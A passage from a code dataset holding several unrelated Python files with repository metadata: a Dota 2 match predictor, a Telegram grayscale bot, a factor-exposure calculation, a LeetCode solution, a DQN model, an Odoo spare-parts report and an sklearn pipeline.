df_append['win_True']\r\n\r\nfrom sklearn.model_selection import train_test_split\r\n\r\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size = 0.3)\r\n\r\nfrom sklearn.linear_model import LinearRegression\r\n\r\nmodel = LinearRegression()\r\n\r\nmodel.fit(x_train, y_train)\r\n\r\nprint(model.coef_)\r\nprint(model.intercept_)\r\n\r\npd.DataFrame(model.coef_, x.columns, columns = ['Coeff'])\r\n\r\npredictions = model.predict(x_test)\r\n\r\nplt.scatter(y_test, predictions)\r\nplt.hist(y_test - predictions)\r\n\r\nfrom sklearn import metrics\r\n\r\nprint('MAE')\r\nprint(metrics.mean_absolute_error(y_test, predictions))\r\nprint('MAE')\r\nprint(metrics.mean_squared_error(y_test, predictions))\r\nprint('root-MSE')\r\nprint(np.sqrt(metrics.mean_squared_error(y_test, predictions)))\r\n\r\n'''\r\n4. Models 2 - a\r\n'''\r\n\r\nimport pandas as pd\r\nimport re\r\n\r\ndf_append = pd.read_csv('data_consolidada.csv')\r\ndf_append = df_append.dropna()\r\n\r\ndf_append['team_name'] = df_append['team_name'].map(lambda x: re.sub(r'[^a-zA-Z0-9\\._-]', '', x))\r\n\r\ndf_append = pd.get_dummies(df_append, prefix='team', columns=['team_name'])\r\n\r\ndf_2021 = df_append.query('(year == 2021)')\r\ndf_append = df_append.query('(year != 2021)')\r\n\r\nfrom numpy import loadtxt\r\nfrom xgboost import XGBClassifier\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import accuracy_score\r\n\r\nX = df_append[['sum_support',\r\n 'sum_nuker', 'sum_initiator', 'sum_escape', 'sum_durable',\r\n 'sum_disabler', 'sum_carry', 'sum_jungler', 'sum_pusher', 'sum_agi',\r\n 'sum_int', 'sum_str', 'sum_melee', 'sum_ranged'\r\n ]]\r\nY = df_append['win_True']\r\n\r\nmax_depth = [6,8,10]\r\nreg_alpha = [0.5,1.5,2.5]\r\nreg_lambda = [1.5,2.5,3.5]\r\nn_estimators = [100,300,500]\r\n\r\nfor rdepth in max_depth:\r\n for ralpha in reg_alpha:\r\n for rlambda in reg_lambda:\r\n for restimator in n_estimators:\r\n\r\n seed = 7\r\n test_size = 0.33\r\n X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=test_size, random_state=seed)\r\n \r\n # fit model no training data\r\n model = XGBClassifier(gamma=0, \r\n learning_rate=0.300000012,\r\n max_depth=rdepth,\r\n n_estimators=restimator, \r\n reg_alpha=ralpha, \r\n reg_lambda=rlambda, \r\n scale_pos_weight=1, subsample=1,\r\n tree_method='exact', validate_parameters=1, verbosity=None, \r\n eval_metric='logloss',\r\n objective = 'binary:logistic')\r\n model.fit(X_train, y_train)\r\n \r\n print('max_depth - ' + str(rdepth))\r\n print('reg_alpha - ' + str(ralpha))\r\n print('reg_lambda - ' + str(rlambda))\r\n print('n_estimators - ' + str(restimator))\r\n #print(model)\r\n \r\n # make predictions for test data\r\n y_pred = model.predict(X_test)\r\n predictions = [round(value) for value in y_pred]\r\n \r\n # evaluate predictions\r\n accuracy = accuracy_score(y_test, predictions)\r\n print(\"Test - Accuracy: %.2f%%\" % (accuracy * 100.0))\r\n \r\n '''\r\n 4. Models 2 - b\r\n '''\r\n # Predict in 2021\r\n X = df_2021[['sum_support',\r\n 'sum_nuker', 'sum_initiator', 'sum_escape', 'sum_durable',\r\n 'sum_disabler', 'sum_carry', 'sum_jungler', 'sum_pusher', 'sum_agi',\r\n 'sum_int', 'sum_str', 'sum_melee', 'sum_ranged', \r\n ]]\r\n Y = df_2021['win_True']\r\n \r\n # make predictions for test data\r\n y_pred = model.predict(X)\r\n predictions = [round(value) for value in y_pred]\r\n \r\n # evaluate predictions\r\n accuracy = accuracy_score(Y, predictions)\r\n print(\"Validation - Accuracy: %.2f%%\" % (accuracy * 100.0))\r\n\r\n\r\nimport pickle\r\n\r\nfilename = 'dota2_model'\r\npickle.dump(model, open(filename, 'wb'))", "repo_name": "Tooruogata/DotaMatchPrediction", "sub_path": "01_Transformacion_Modeling.py", "file_name": "01_Transformacion_Modeling.py", "file_ext": "py", "file_size_in_byte": 14246, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.chdir", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 27, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 30, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 38, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 41, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 52, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 62, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 63, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 148, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 151, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 165, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 177, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 181, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 188, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 192, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 192, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 193, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 193, "usage_type": "name"}, {"api_name": "sklearn.metrics.mean_absolute_error", "line_number": 198, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 198, "usage_type": "name"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 200, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 200, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 202, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 202, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 202, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 211, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 214, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 216, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 245, "usage_type": "call"}, {"api_name": "xgboost.XGBClassifier", "line_number": 248, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 271, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 290, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 297, "usage_type": "call"}]} +{"seq_id": "561536400", "text": "from telegram import (ReplyKeyboardMarkup, ReplyKeyboardRemove)\nfrom telegram.ext import (Updater, CommandHandler, MessageHandler, Filters, RegexHandler,\n ConversationHandler)\n\nimport logging\nimport os\nfrom PhotoProc import Grayscale\n\n\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.INFO)\n\nlogger = logging.getLogger(__name__)\n\ndef start(bot, update):\n\tupdate.message.reply_text(\"Hi! Send a image and I will send you it in black and white\")\n\ndef help(bot, update):\n\tupdate.message.reply_text(\"Send a image and I will send you it in black and white\")\n\ndef ReplyBWImage(bot, update):\n user = update.message.from_user\n photo_file = bot.get_file(update.message.photo[-1].file_id)\n photoName = str(update.message.chat_id)+\"Normal.png\"\n photo_file.download(photoName)\n \n photoGS = Grayscale(photoName)\n\n update.message.reply_photo(photo=open(photoGS, 'rb'))\n\n os.remove(photoGS)\n os.remove(photoName)\n\ndef error(bot, update, error):\n\tlogger.warning('Update \"%s\" caused error \"%s\"', update, error)\n\n\ndef main():\n\tupdater = Updater(\"token\")\n\n\tdp = updater.dispatcher\n\tdp.add_handler(CommandHandler(\"start\", start))\n\tdp.add_handler(CommandHandler(\"help\", help))\n\n\tdp.add_handler(MessageHandler(Filters.photo, ReplyBWImage))\n\n\tdp.add_error_handler(error)\n\n\tupdater.start_polling()\n\tupdater.idle()\n\nif __name__ == '__main__':\n\tmain()", "repo_name": "digitaldav/Grayscale-Telegram-Bot", "sub_path": "TelegramBot.py", "file_name": "TelegramBot.py", "file_ext": "py", "file_size_in_byte": 1444, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.basicConfig", "line_number": 10, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 11, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 13, "usage_type": "call"}, {"api_name": "PhotoProc.Grayscale", "line_number": 27, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 31, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 32, "usage_type": "call"}, {"api_name": "telegram.ext.Updater", "line_number": 39, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 42, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 43, "usage_type": "call"}, {"api_name": "telegram.ext.MessageHandler", "line_number": 45, "usage_type": "call"}, {"api_name": "telegram.ext.Filters.photo", "line_number": 45, "usage_type": "attribute"}, {"api_name": "telegram.ext.Filters", "line_number": 45, "usage_type": "name"}]} +{"seq_id": "13188595398", "text": "import os\nimport datetime as dt\nimport sys\nimport pandas as pd\nfrom skyrim.falkreath import CLib1Tab1\nfrom skyrim.falkreath import CManagerLibWriter\n\n\ndef cal_corr(t_sub_df: pd.DataFrame, t_x: str, t_y: str, t_sort_var: str, t_top_size: int):\n _sorted_df = t_sub_df.sort_values(by=t_sort_var, ascending=False)\n _top_df = _sorted_df.head(t_top_size)\n _r = _top_df[[t_x, t_y]].corr(method=\"spearman\").at[t_x, t_y]\n return -_r\n\n\ndef fac_exp_alg_cx(\n run_mode: str, bgn_date: str, stp_date: str | None,\n cx: str, cx_window: int, top_prop: float,\n instruments_universe: list[str],\n database_structure: dict[str, CLib1Tab1],\n major_return_dir: str,\n factors_exposure_dir: str,\n):\n \"\"\"\n\n :param run_mode:\n :param bgn_date:\n :param stp_date:\n :param cx: must be one of [\"CSP\", \"CSR\", \"CTP\", \"CTR\", \"CVP\", \"CVR\"]\n :param cx_window:\n :param top_prop:\n :param instruments_universe:\n :param database_structure:\n :param major_return_dir:\n :param factors_exposure_dir:\n :return:\n \"\"\"\n factor_lbl = \"{}{:03d}T{:02d}\".format(cx, cx_window, int(top_prop * 10))\n if stp_date is None:\n stp_date = (dt.datetime.strptime(bgn_date, \"%Y%m%d\") + dt.timedelta(days=1)).strftime(\"%Y%m%d\")\n top_size = int(cx_window * top_prop) + 1\n if cx.upper() == \"CSP\":\n x, y = \"sigma\", \"instru_idx\"\n elif cx.upper() == \"CSR\":\n x, y = \"sigma\", \"major_return\"\n elif cx.upper() == \"CTP\":\n x, y = \"turnover\", \"instru_idx\"\n elif cx.upper() == \"CTR\":\n x, y = \"turnover\", \"major_return\"\n elif cx.upper() == \"CVP\":\n x, y = \"volume\", \"instru_idx\"\n elif cx.upper() == \"CVR\":\n x, y = \"volume\", \"major_return\"\n else:\n print(\"... Error! when calculating CX\")\n print(\"... cx = \", cx, \"is not a legal input, please check again\")\n print(\"... this function will terminate at once\")\n sys.exit()\n\n # --- init major contracts\n all_factor_dfs = []\n for instrument in instruments_universe:\n major_return_file = \"major_return.{}.close.csv.gz\".format(instrument)\n major_return_path = os.path.join(major_return_dir, major_return_file)\n major_return_df = pd.read_csv(major_return_path, dtype={\"trade_date\": str}).set_index(\"trade_date\")\n if cx.upper() in [\"CSP\", \"CSR\"]:\n major_return_df[x] = major_return_df[\"high\"] / major_return_df[\"low\"] - 1\n elif cx.upper() in [\"CTP\", \"CTR\"]:\n major_return_df[x] = major_return_df[\"volume\"] / major_return_df[\"oi\"]\n r_data = {}\n for i in range(len(major_return_df)):\n trade_date = major_return_df.index[i]\n if (trade_date < bgn_date) or (trade_date >= stp_date):\n continue\n sub_df = major_return_df.iloc[i - cx_window + 1:i + 1]\n r_data[trade_date] = cal_corr(t_sub_df=sub_df, t_x=x, t_y=y, t_sort_var=\"volume\", t_top_size=top_size)\n factor_df = pd.DataFrame({\"instrument\": instrument, factor_lbl: pd.Series(r_data)})\n all_factor_dfs.append(factor_df[[\"instrument\", factor_lbl]])\n\n # --- reorganize\n all_factor_df = pd.concat(all_factor_dfs, axis=0, ignore_index=False)\n all_factor_df.sort_index(inplace=True)\n\n # --- save\n factor_lib_structure = database_structure[factor_lbl]\n factor_lib = CManagerLibWriter(\n t_db_name=factor_lib_structure.m_lib_name,\n t_db_save_dir=factors_exposure_dir\n )\n factor_lib.initialize_table(t_table=factor_lib_structure.m_tab, t_remove_existence=run_mode in [\"O\", \"OVERWRITE\"])\n factor_lib.update(t_update_df=all_factor_df, t_using_index=True)\n factor_lib.close()\n\n print(\"... @ {} factor = {:>12s} calculated\".format(dt.datetime.now(), factor_lbl))\n return 0\n", "repo_name": "huxiaoou/Project_2023_06_EquityIndex_ML_V2", "sub_path": "algs/factor_exposure_cx.py", "file_name": "factor_exposure_cx.py", "file_ext": "py", "file_size_in_byte": 3769, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pandas.DataFrame", "line_number": 9, "usage_type": "attribute"}, {"api_name": "skyrim.falkreath.CLib1Tab1", "line_number": 20, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 40, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 40, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 40, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 65, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 77, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 77, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 81, "usage_type": "call"}, {"api_name": "skyrim.falkreath.CManagerLibWriter", "line_number": 86, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 94, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 94, "usage_type": "attribute"}]} +{"seq_id": "14959002823", "text": "\"\"\"You are given two positive integer arrays spells and potions, of length n and m respectively, where spells[i]\nrepresents the strength of the ith spell and potions[j] represents the strength of the jth potion.\n\nYou are also given an integer success. A spell and potion pair is considered successful if the product of their\nstrengths is at least success.\n\nReturn an integer array pairs of length n where pairs[i] is the number of potions that will form a successful pair\nwith the ith spell.\n\nExample 1:\n\nInput: spells = [5,1,3], potions = [1,2,3,4,5], success = 7\nOutput: [4,0,3]\nExplanation:\n- 0th spell: 5 * [1,2,3,4,5] = [5,10,15,20,25]. 4 pairs are successful.\n- 1st spell: 1 * [1,2,3,4,5] = [1,2,3,4,5]. 0 pairs are successful.\n- 2nd spell: 3 * [1,2,3,4,5] = [3,6,9,12,15]. 3 pairs are successful.\nThus, [4,0,3] is returned.\n\nExample 2:\n\nInput: spells = [3,1,2], potions = [8,5,8], success = 16\nOutput: [2,0,2]\nExplanation:\n- 0th spell: 3 * [8,5,8] = [24,15,24]. 2 pairs are successful.\n- 1st spell: 1 * [8,5,8] = [8,5,8]. 0 pairs are successful.\n- 2nd spell: 2 * [8,5,8] = [16,10,16]. 2 pairs are successful.\nThus, [2,0,2] is returned.\n\n\nConstraints:\n\nn == spells.length\nm == potions.length\n1 <= n, m <= 105\n1 <= spells[i], potions[i] <= 105\n1 <= success <= 1010\n\"\"\"\nfrom bisect import bisect\nfrom typing import List\n\n\nclass Solution:\n def int_array(self, spell: int, potions: list[int]) -> List[int]:\n return [num * spell for num in potions]\n\n def check_success(self, int_array: list[int], success: int) -> list[int]:\n return [num for num in int_array if num >= success]\n\n def successfulPairs1(self, spells: List[int], potions: List[int], success: int) -> List[int]:\n result = []\n\n for spell in spells:\n int_array = self.int_array(spell, sorted(potions))\n result.append(len(self.check_success(int_array, success)))\n\n return result\n\n def successfulPairs(self, spells: List[int], potions: List[int], success: int) -> List[int]:\n n, m = len(spells), len(potions)\n\n pairs = [0] * n\n potions.sort()\n\n for i in range(n):\n spell = spells[i]\n left = 0\n right = m - 1\n while left <= right:\n mid = left + (right - left) // 2\n product = spell * potions[mid]\n if product >= success:\n right = mid - 1\n else:\n left = mid + 1\n pairs[i] = m - left\n\n return pairs\n\n\nsolution = Solution()\nprint(solution.successfulPairs(spells=[5, 1, 3], potions=[1, 2, 3, 4, 5], success=7))\nprint(solution.successfulPairs(spells = [3,1,2], potions = [8,5,8], success = 16))\nprint(solution.successfulPairs(spells = [3,1,2], potions = [1,2,3,4,5], success = 16))\n", "repo_name": "ImSakunthala/leetcode", "sub_path": "Intermediate_level/array/successful_pairs_of_spells_and_portions.py", "file_name": "successful_pairs_of_spells_and_portions.py", "file_ext": "py", "file_size_in_byte": 2792, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.List", "line_number": 44, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 50, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 59, "usage_type": "name"}]} +{"seq_id": "8494739205", "text": "from gym import spaces\r\nimport torch.nn as nn\r\nimport numpy as np\r\nimport torch\r\n\r\nclass DQN(nn.Module):\r\n \"\"\"\r\n A basic implementation of a Deep Q-Network. The architecture is the same as that described in the\r\n Nature DQN paper.\r\n \"\"\"\r\n\r\n def __init__(self, glyphs: spaces.Box, action_space: spaces.Discrete):\r\n \"\"\"\r\n Initialise the DQN\r\n :param observation_space: the state space of the environment\r\n :param action_space: the action space of the environment\r\n \"\"\"\r\n super().__init__()\r\n #create a CNN with 3 convolutional layers and 2 fully connected layers\r\n self.action_space = action_space.n\r\n self.conv1 = nn.Conv2d(1, 32, kernel_size=3, stride=1)\r\n self.conv2 = nn.Conv2d(32, 64, kernel_size=3, stride=1)\r\n self.conv3 = nn.Conv2d(64, 64, kernel_size=3, stride=1)\r\n\r\n self.fc1 = nn.Linear(576, 512)\r\n self.fc2 = nn.Linear(512, action_space.n) #outputs tensor with an action value\r\n\r\n def forward(self, new_glyphs):\r\n x_glyphs = new_glyphs.unsqueeze(1).float() \r\n\r\n # Implement the Deep Q-Network\r\n x = nn.functional.relu(self.conv1(x_glyphs))\r\n x = nn.functional.relu(self.conv2(x))\r\n x = nn.functional.relu(self.conv3(x))\r\n\r\n #Flatten the 4D tensor (bastch_size x color_channel x stack x dimensions) to 2D tensor\r\n x = nn.functional.relu(self.fc1(x.view(x.size(0), -1)))\r\n return self.fc2(x)\r\n", "repo_name": "ClaudzTheEngineer/COMS4047_Assignment", "sub_path": "dqn/model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 1466, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torch.nn.Module", "line_number": 6, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 6, "usage_type": "name"}, {"api_name": "gym.spaces.Box", "line_number": 12, "usage_type": "attribute"}, {"api_name": "gym.spaces", "line_number": 12, "usage_type": "name"}, {"api_name": "gym.spaces.Discrete", "line_number": 12, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv2d", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 25, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 26, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 32, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 32, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 33, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 33, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 34, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 34, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 37, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 37, "usage_type": "name"}]} +{"seq_id": "39741808798", "text": "from odoo.osv import osv\nfrom operator import itemgetter\nfrom odoo import _\nimport odoo\nfrom odoo import api\nfrom odoo import models\nfrom odoo.addons.plm.report.book_collector import BookCollector\nfrom odoo.addons.plm.report.book_collector import getBottomMessage\n\nfrom odoo.tools import DEFAULT_SERVER_DATETIME_FORMAT\nimport time\nfrom io import BytesIO\nimport base64\nimport os\nimport logging\nfrom datetime import datetime\nfrom dateutil import tz\n\n\nfrom PyPDF2 import PdfFileWriter\nfrom PyPDF2 import PdfFileReader\n\n\ndef isPdf(fileName):\n if (os.path.splitext(fileName)[1].lower() == '.pdf'):\n return True\n return False\n\n\ndef getDocumentStream(docRepository, objDoc):\n \"\"\"\n Gets the stream of a file\n \"\"\"\n content = False\n try:\n if (not objDoc.store_fname) and (objDoc.db_datas):\n content = base64.b64decode(objDoc.db_datas)\n else:\n with open(os.path.join(docRepository, objDoc.store_fname), 'rb') as f:\n content = f.read()\n except Exception as ex:\n logging.error(\"getFileStream : Exception (%s)reading stream on file : %s.\" % (ex, objDoc.datas_fname))\n return content\n\n\ndef _translate(value):\n return _(value)\n\n\ndef BomSort(myObject):\n bomobject = []\n res = {}\n index = 0\n for l in myObject:\n res[str(index)] = l.itemnum\n index += 1\n items = res.items()\n items.sort(key=itemgetter(1))\n for res in items:\n bomobject.append(myObject[int(res[0])])\n return bomobject\n\n\ndef get_parent(myObject):\n return [myObject.product_tmpl_id.name,\n '',\n _(myObject.product_tmpl_id.name) or _(myObject.product_tmpl_id.default_code),\n myObject.product_tmpl_id.engineering_revision,\n _(myObject.product_tmpl_id.description),\n '',\n '',\n myObject.product_qty,\n '',\n myObject.weight_net,\n ]\n\n\nclass report_spare_parts_header(models.AbstractModel):\n _name = 'report.plm_spare.bom_spare_header'\n\n def get_document_brws(self, objProduct):\n oldest_obj = None\n oldest_dt = None\n if objProduct:\n for linkedBrwsDoc in objProduct.linkeddocuments:\n create_date_str = linkedBrwsDoc.create_date\n create_date = datetime.strptime(create_date_str, DEFAULT_SERVER_DATETIME_FORMAT)\n if oldest_dt is None or create_date < oldest_dt:\n oldest_dt = create_date\n oldest_obj = linkedBrwsDoc\n return oldest_obj\n\n def get_report_values(self, docids, data=None):\n products = self.env['product.product'].browse(docids)\n return {'docs': products,\n 'time': time,\n 'get_document_brws': self.get_document_brws}\n\n\nclass ReportSpareDocumentOne(models.AbstractModel):\n _name = 'report.plm_spare.pdf_one'\n \"\"\"\n Calculates the bom structure spare parts manual\n \"\"\"\n\n @api.model\n def create(self, components):\n recursion = True\n if ReportSpareDocumentOne._name == 'report.plm_spare.pdf_one':\n recursion = False\n self.processedObjs = []\n\n componentType = self.env['product.product']\n bomType = self.env['mrp.bom']\n user = self.env['res.users'].browse(self.env.uid)\n msg = getBottomMessage(user, self.env.context)\n mainBookCollector = BookCollector(customTest=(True, msg))\n for component in components:\n self.processedObjs = []\n buf = self.getFirstPage([component.id])\n mainBookCollector.addPage((buf, ''))\n self.getSparePartsPdfFile(component, mainBookCollector, componentType, bomType, recursion)\n if mainBookCollector is not None:\n pdf_string = BytesIO()\n mainBookCollector.collector.write(pdf_string)\n out = pdf_string.getvalue()\n pdf_string.close()\n byteString = b\"data:application/pdf;base64,\" + base64.b64encode(out)\n return byteString.decode('UTF-8')\n logging.warning('Unable to create PDF')\n return (False, '')\n\n def getSparePartsPdfFile(self, product, output, componentTemplate, bomTemplate, recursion):\n packedObjs = []\n packedIds = []\n if product in self.processedObjs:\n return\n bomBrwsIds = bomTemplate.search([('product_id', '=', product.id), ('type', '=', 'spbom')])\n if len(bomBrwsIds) < 1:\n bomBrwsIds = bomTemplate.search([('product_tmpl_id', '=', product.product_tmpl_id.id), ('type', '=', 'spbom')])\n if len(bomBrwsIds) > 0:\n if bomBrwsIds:\n self.processedObjs.append(product)\n for bom_line in bomBrwsIds.bom_line_ids:\n packedObjs.append(bom_line.product_id)\n packedIds.append(bom_line.id)\n if len(packedIds) > 0:\n for pageStream in self.getPdfComponentLayout(product):\n try:\n output.addPage((pageStream, ''))\n except Exception as ex:\n logging.error(ex)\n raise ex\n pdf = self.env.ref('plm.report_plm_bom_structure_one').sudo().render_qweb_pdf(bomBrwsIds.ids)[0]\n pageStream = BytesIO()\n pageStream.write(pdf)\n output.addPage((pageStream, ''))\n if recursion:\n for packedObj in packedObjs:\n if packedObj not in self.processedObjs:\n self.getSparePartsPdfFile(packedObj, output, componentTemplate, bomTemplate, recursion)\n\n def getPdfComponentLayout(self, component):\n ret = []\n docRepository = self.env['plm.document']._get_filestore()\n for document in component.linkeddocuments:\n if (document.usedforspare) and (document.type == 'binary'):\n if document.printout and str(document.printout) != 'None':\n ret.append(BytesIO(base64.b64decode(document.printout)))\n elif isPdf(document.datas_fname):\n value = getDocumentStream(docRepository, document)\n if value:\n ret.append(BytesIO(value))\n return ret\n\n def getFirstPage(self, ids):\n strbuffer = BytesIO()\n # todo: si rompe qui con v11 .. capire come fare il report da codice \n pdf = self.env.ref('plm_spare.report_product_product_spare_header').sudo().render_qweb_pdf(ids)[0]\n strbuffer.write(pdf)\n return strbuffer\n\n @api.model\n def get_report_values(self, docids, data=None):\n documents = self.env['product.product'].browse(docids)\n return {'docs': documents,\n 'get_content': self.create}\n\n\nclass ReportSpareDocumentAll(ReportSpareDocumentOne):\n _name = 'report.plm_spare.pdf_all'\n", "repo_name": "kulius/odoo11_uw", "sub_path": "custom/plm_spare-11.0.1.1/plm_spare/report/spare_parts_manual.py", "file_name": "spare_parts_manual.py", "file_ext": "py", "file_size_in_byte": 6953, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.splitext", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "base64.b64decode", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "logging.error", "line_number": 42, "usage_type": "call"}, {"api_name": "odoo._", "line_number": 47, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 58, "usage_type": "call"}, {"api_name": "odoo._", "line_number": 67, "usage_type": "call"}, {"api_name": "odoo._", "line_number": 69, "usage_type": "call"}, {"api_name": "odoo.models.AbstractModel", "line_number": 78, "usage_type": "attribute"}, {"api_name": "odoo.models", "line_number": 78, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 87, "usage_type": "call"}, {"api_name": "odoo.tools.DEFAULT_SERVER_DATETIME_FORMAT", "line_number": 87, "usage_type": "argument"}, {"api_name": "datetime.datetime", "line_number": 87, "usage_type": "name"}, {"api_name": "odoo.models.AbstractModel", "line_number": 100, "usage_type": "attribute"}, {"api_name": "odoo.models", "line_number": 100, "usage_type": "name"}, {"api_name": "odoo.addons.plm.report.book_collector.getBottomMessage", "line_number": 116, "usage_type": "call"}, {"api_name": "odoo.addons.plm.report.book_collector.BookCollector", "line_number": 117, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 124, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 128, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 130, "usage_type": "call"}, {"api_name": "odoo.api.model", "line_number": 106, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 106, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 152, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 155, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 169, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 169, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 173, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 177, "usage_type": "call"}, {"api_name": "odoo.api.model", "line_number": 183, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 183, "usage_type": "name"}]} +{"seq_id": "36318218832", "text": "from sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import StandardScaler\nnum_pipeline = Pipeline([\n('imputer', SimpleImputer(strategy=\"median\")),\n('attribs_adder', CombinedAttributesAdder()),\n('std_scaler', StandardScaler()), # alternative: MinMaxScaler()\n])\ndataset_num_tr = num_pipeline.fit_transform(dataset_num)\n\n\n# one transformer to take care of all numeric and categorical columns:\nfrom sklearn.compose import ColumnTransformer\nnum_attribs = list(dataset_num) # get numeric columns\ncat_attribs = [\"categorical_columns\"] # get catgorical columns\nfull_pipeline = ColumnTransformer([\n(\"num\", num_pipeline, num_attribs),\n(\"cat\", OneHotEncoder(), cat_attribs),\n])\ndataset_prepared = full_pipeline.fit_transform(dataset)\n", "repo_name": "guochen-code/Hands-on-Machine-Learning", "sub_path": "Transformation Pipelines.py", "file_name": 